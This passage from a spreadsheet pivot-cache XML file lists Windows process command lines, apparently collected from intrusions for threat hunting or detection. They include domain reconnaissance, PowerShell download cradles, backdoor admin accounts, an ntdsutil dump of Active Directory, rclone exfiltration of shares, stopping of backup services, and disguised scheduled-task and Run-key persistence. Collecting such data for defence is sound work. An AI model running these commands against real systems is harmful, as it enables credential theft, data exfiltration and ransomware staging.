    <x v="13"/>
  </r>
  <r>
    <s v="procc-eid0493"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="procc-eid0494"/>
    <m/>
    <m/>
    <s v="rundll32.exe C:\Users\USER\AppData\Local\Temp\7A86.dll,DllRegisterServer"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="procc-eid0495"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="procc-eid0496"/>
    <m/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="procc-eid0497"/>
    <m/>
    <m/>
    <s v="net localgroup &quot;administrator&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="procc-eid0498"/>
    <m/>
    <m/>
    <s v="net group &quot;domain admins&quot; /dom"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="procc-eid0499"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\net1 group &quot;domain admins&quot; /dom"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="procc-eid0500"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C systeminfo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="procc-eid0501"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C ping DOMAINCONTROLLER"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="procc-eid0502"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C ping ENDPOINT"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="procc-eid0503"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C net localgroup Administrators"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="procc-eid0504"/>
    <m/>
    <m/>
    <s v="C:\Windows\System32\Taskmgr.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="procc-eid0505"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C time"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="procc-eid0506"/>
    <m/>
    <m/>
    <s v="{&quot;object&quot;: &quot;net&quot;, &quot;initiating_process_command_line&quot;: &quot;svchost.exe -k UnistackSvcGroup -s WpnUserService&quot;, &quot;remote_port&quot;: &quot;445&quot;}"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="procc-eid0507"/>
    <m/>
    <m/>
    <s v="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -exec bypass -EncodedCommand "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="procc-eid0508"/>
    <m/>
    <m/>
    <s v="IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:33242/'); Get-WmiObject -Class win32_logicalDisk -ComputerName SYSTEMNAME | Select-Object pscomputername, Name, @{n=&quot;Space&quot;;e={[math]::Round($_.Size/1GB,2)}}, @{n=&quot;FreeSpace&quot;;e={[math]::Round($_.FreeSpace/1GB,2)}}, @{n=&quot;BUSY&quot;;e={[math]::Round(($_.Size-$_.FreeSpace)/1GB,2)}}"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="procc-eid0509"/>
    <m/>
    <m/>
    <s v="powershell.exe -executionpolicy remotesigned -File .\Get-DataInfo.ps1 method"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="procc-eid0510"/>
    <m/>
    <m/>
    <s v="Get-ADComputer -Filter {enabled -eq $true} -properties *|select Name, DNSHostName, OperatingSystem, LastLogonDate | Export-CSV C:\Users\AllWindows.csv -NoTypeInformation -Encoding UTF8"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="procc-eid0511"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C wmic /node:&quot;DOMAINCONTROLLER&quot; process call create &quot;C:\3.exe&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="procc-eid0512"/>
    <m/>
    <m/>
    <s v="C:\Users\REDACTED\AppData\Local\Temp\1\is-HCFKT.tmp\WinSCP-5.19.1-Setup.tmp&quot; /SL5=&quot;$A02B0,10288106,864256,C:\Users\USER\Desktop\WinSCP-5.19.1-Setup.exe&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="procc-eid0513"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C wmic /node:&quot;ENDPOINT&quot; process call create &quot;C:\test.exe&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="procc-eid0514"/>
    <m/>
    <m/>
    <s v="rundll32.exe C:\Users\USER\AppData\Local\Temp\randomstring.dll,#1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0515"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\svchost.exe -k UnistackSvcGroup"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0516"/>
    <m/>
    <m/>
    <s v="net user sqlbackup qc69t4b#z0ke3 /add"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0517"/>
    <m/>
    <m/>
    <s v="net user localadmin qc69t4b#z0ke3 /add"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0518"/>
    <m/>
    <m/>
    <s v="net localgroup administrators localadmin /add"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0519"/>
    <m/>
    <m/>
    <s v="ntdsutil &quot;ac in ntds&quot; &quot;ifm&quot; &quot;create full c:\windows\temp\crashpad\x&quot; q q"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0520"/>
    <m/>
    <m/>
    <s v="ntdsAudit.exe ntds.dit -s SYSTEM -p pwddump.txt -u users.csv"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0521"/>
    <m/>
    <m/>
    <s v="net view /all  "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0522"/>
    <m/>
    <m/>
    <s v="net view /all /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0523"/>
    <m/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0524"/>
    <m/>
    <m/>
    <s v="net localgroup &quot;administrator&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0525"/>
    <m/>
    <m/>
    <s v="net group &quot;domain admins&quot; /dom "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0526"/>
    <m/>
    <m/>
    <s v="ipconfig /all"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0527"/>
    <m/>
    <m/>
    <s v="nltest /dclist "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0528"/>
    <m/>
    <m/>
    <s v="net group &quot;Domain Admins&quot; /dom"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0529"/>
    <m/>
    <m/>
    <s v="tasklist"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0530"/>
    <m/>
    <m/>
    <s v="net  localgroup Administrateurs"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0531"/>
    <m/>
    <m/>
    <s v="net localgroup Administrators"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0532"/>
    <m/>
    <m/>
    <s v="SYSTEMINFO"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0533"/>
    <m/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=person)&quot; "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0534"/>
    <m/>
    <m/>
    <s v="adfind.exe -f &quot;objectcategory=computer&quot; "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0535"/>
    <m/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=organizationalunit)&quot; "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0536"/>
    <m/>
    <m/>
    <s v="adfind.exe -sc trustdmp "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0537"/>
    <m/>
    <m/>
    <s v="adfind.exe -subnets -f (objectcategory=subnet)  "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0538"/>
    <m/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=group)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0539"/>
    <m/>
    <m/>
    <s v="adfind.exe -gcb -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0540"/>
    <m/>
    <m/>
    <s v="net use "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0541"/>
    <m/>
    <m/>
    <s v="netstat -ano"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0542"/>
    <m/>
    <m/>
    <s v="net group &quot;domain admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0543"/>
    <m/>
    <m/>
    <s v="arp -a "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0544"/>
    <m/>
    <m/>
    <s v="ping -n 1 hostname &gt;&gt; C:\programdata\log.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0545"/>
    <m/>
    <m/>
    <s v="Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\shares.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0546"/>
    <m/>
    <m/>
    <s v="Get-NetDomain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0547"/>
    <m/>
    <m/>
    <s v="Get-NetCurrentUser"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0548"/>
    <m/>
    <m/>
    <s v="Get-ADDomainController"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0549"/>
    <m/>
    <m/>
    <s v="Get-ADDomainController -Filter * | ft"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0550"/>
    <m/>
    <m/>
    <s v="Get-ADComputer -Filter * -Properties * | Get-Member"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0551"/>
    <m/>
    <m/>
    <s v="Get-ADDomain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0552"/>
    <m/>
    <m/>
    <s v="dir &quot;\\hostname\c$\Program Files\* &gt;&gt; C:\programdata\AV.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0553"/>
    <m/>
    <m/>
    <s v="rclone.exe copy--max-age 3y &quot;\\&lt;redacted&gt;\C$\Shares&quot; remote: &lt;redacted&gt;\&lt;redacted&gt; --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0554"/>
    <m/>
    <m/>
    <s v="cmd.exe /c ipconfig"/>
    <s v="rundll32.exe c:\users\&lt;&gt;\appdata\local\temp\37b.dll, entrypoint"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0555"/>
    <m/>
    <m/>
    <s v="cmd.exe /c ipconfig /all"/>
    <s v="rundll32.exe c:\users\&lt;&gt;\appdata\local\temp\37b.dll, entrypoint"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0556"/>
    <m/>
    <m/>
    <s v="cmd.exe /c ping"/>
    <s v="rundll32.exe c:\users\&lt;&gt;\appdata\local\temp\37b.dll, entrypoint"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0557"/>
    <m/>
    <m/>
    <s v="cmd.exe /c nltest /dclist"/>
    <s v="rundll32.exe c:\users\&lt;&gt;\appdata\local\temp\37b.dll, entrypoint"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0558"/>
    <m/>
    <m/>
    <s v="cmd.exe /c net group &quot;Domain Admins&quot; /dom"/>
    <s v="rundll32.exe c:\users\&lt;&gt;\appdata\local\temp\37b.dll, entrypoint"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0559"/>
    <m/>
    <m/>
    <s v="cmd.exe /c tasklist"/>
    <s v="rundll32.exe c:\users\&lt;&gt;\appdata\local\temp\37b.dll, entrypoint"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0560"/>
    <m/>
    <m/>
    <s v="cmd.exe /c net localgroup administators"/>
    <s v="rundll32.exe c:\users\&lt;&gt;\appdata\local\temp\37b.dll, entrypoint"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0561"/>
    <m/>
    <m/>
    <s v="cmd.exe /c systeminfo"/>
    <s v="rundll32.exe c:\users\&lt;&gt;\appdata\local\temp\37b.dll, entrypoint"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0562"/>
    <m/>
    <m/>
    <s v="cmd c/ nltest /domain_trusts /all_trusts"/>
    <s v="rundll32.exe c:\users\&lt;&gt;\appdata\local\temp\37b.dll, entrypoint"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0563"/>
    <m/>
    <m/>
    <s v="svchost.exe -k UnistackSvcGroup"/>
    <s v="rundll32.exe C:\Users\&lt;&gt;\AppData\Local\Temp\randomstring.dll,EntryPoint"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="procc-eid0564"/>
    <m/>
    <m/>
    <s v="net view /all "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="procc-eid0565"/>
    <m/>
    <m/>
    <s v="net view /all /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="procc-eid0566"/>
    <m/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="procc-eid0567"/>
    <m/>
    <m/>
    <s v="net localgroup &quot;administrator&quot; "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="procc-eid0568"/>
    <m/>
    <m/>
    <s v="net group &quot;domain admins&quot; /dom"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="procc-eid0569"/>
    <m/>
    <m/>
    <s v="AdFind.exe -f &quot;(objectcategory=person)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="procc-eid0570"/>
    <m/>
    <m/>
    <s v="AdFind.exe -f &quot;(objectcategory=computer)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="procc-eid0571"/>
    <m/>
    <m/>
    <s v="AdFind.exe -f &quot;(objectcategory=organizationalUnit)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="procc-eid0572"/>
    <m/>
    <m/>
    <s v="AdFind.exe -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="procc-eid0573"/>
    <m/>
    <m/>
    <s v="AdFind.exe -subnets -f &quot;(objectCategory=subnet)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="procc-eid0574"/>
    <m/>
    <m/>
    <s v="AdFind.exe -f &quot;(objectcategory=group)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="procc-eid0575"/>
    <m/>
    <m/>
    <s v="AdFind.exe -gcb -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="procc-eid0576"/>
    <m/>
    <m/>
    <s v="Import-Module ActiveDirectory; Get-ADComputer -Filter {enabled -eq $true} -properties *|select DNSHostName, IPv4Address, OperatingSystem, LastLogonDate"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="procc-eid0577"/>
    <m/>
    <m/>
    <s v="IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:23163/'); Import-Module ActiveDirectory; Get-ADComputer -Filter {enabled -eq $true} -properties *|select DNSHostName, IPv4Address, OperatingSystem, LastLogonDate"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="procc-eid0578"/>
    <m/>
    <m/>
    <s v="&quot;C:\Windows\system32\net1 stop &quot;&quot;samss&quot;&quot; /y&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="procc-eid0579"/>
    <m/>
    <m/>
    <s v="&quot;C:\Windows\system32\net1 stop &quot;&quot;veeamcatalogsvc&quot;&quot; /y&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="procc-eid0580"/>
    <m/>
    <m/>
    <s v="&quot;C:\Windows\system32\net1 stop &quot;&quot;veeamcloudsvc&quot;&quot; /y&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="procc-eid0581"/>
    <m/>
    <m/>
    <s v="&quot;C:\Windows\system32\net1 stop &quot;&quot;veeamdeploysvc&quot;&quot; /y&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="procc-eid0582"/>
    <m/>
    <m/>
    <s v="&quot;C:\Windows\system32\taskmgr.exe&quot;&quot; /4&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="procc-eid0583"/>
    <m/>
    <m/>
    <s v="&quot;C:\Windows\system32\wbem\wmiprvse.exe -Embedding&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="procc-eid0584"/>
    <m/>
    <m/>
    <s v="&quot;C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="procc-eid0585"/>
    <m/>
    <m/>
    <s v="&quot;C:\Windows\System32\schtasks.exe&quot; /CREATE /SC ONSTART /TN jf0c /TR &quot;'C:\Users\pagefilerpqy.exe'&quot; /f"/>
    <m/>
    <m/>
    <s v="firefox.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="procc-eid0586"/>
    <m/>
    <m/>
    <s v="&quot;C:\Windows\System32\schtasks.exe&quot; /CREATE /SC ONSTART /TN jf0c /TR &quot;'C:\Users\pagefilerpqy.exe'&quot; /f /RL HIGHEST"/>
    <m/>
    <m/>
    <s v="firefox.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="procc-eid0587"/>
    <m/>
    <m/>
    <s v="C:\Windows\System32\schtasks.exe /CREATE /SC ONCE /ST 17:21:58 /TN 9T6ukfi6 /TR &quot;'C:\Users\pagefilerpqy.exe'&quot; /f "/>
    <m/>
    <m/>
    <s v="firefox.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="procc-eid0588"/>
    <m/>
    <m/>
    <s v="C:\Windows\System32\schtasks.exe&quot; /CREATE /SC ONCE /ST 17:21:58 /TN 9T6ukfi6 /TR &quot;'C:\Users\pagefilerpqy.exe'&quot; /f /RL HIGHEST"/>
    <m/>
    <m/>
    <s v="firefox.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="procc-eid0589"/>
    <m/>
    <m/>
    <s v=" &quot;REG ADD &quot;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&quot; /V \&quot;microsoft update\&quot; /t REG_SZ /F /D &quot;SCHTASKS /run /tn 9T6ukfi6&quot;"/>
    <m/>
    <m/>
    <s v="firefox.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="procc-eid0590"/>
    <m/>
    <m/>
    <s v="&quot;REG ADD &quot;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&quot; /V \&quot;microsoft update\&quot; /t REG_SZ /F /D &quot;SCHTASKS /run /tn 9T6ukfi6&quot;"/>
    <m/>
    <m/>
    <s v="firefox.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="procc-eid0591"/>
    <m/>
    <m/>
    <s v="ipconfig /all"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0592"/>
    <m/>
    <m/>
    <s v="systeminfo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0593"/>
    <m/>
    <m/>
    <s v="WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0594"/>
    <m/>
    <m/>
    <s v="net config workstation"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0595"/>
    <m/>
    <m/>
    <s v="nltest /domain_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0596"/>
    <m/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0597"/>
    <m/>
    <m/>
    <s v="net view /all /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0598"/>
    <m/>
    <m/>
    <s v="net view /all"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0599"/>
    <m/>
    <m/>
    <s v="net group &quot;Domain Admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0600"/>
    <m/>
    <m/>
    <s v="cmd.exe /C nltest /dclist:"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0601"/>
    <m/>
    <m/>
    <s v="cmd.exe /C net group /domain &quot;Domain Computers&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0602"/>
    <m/>
    <m/>
    <s v="cmd.exe /C net group /domain &quot;Enterprise Admins&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0603"/>
    <m/>
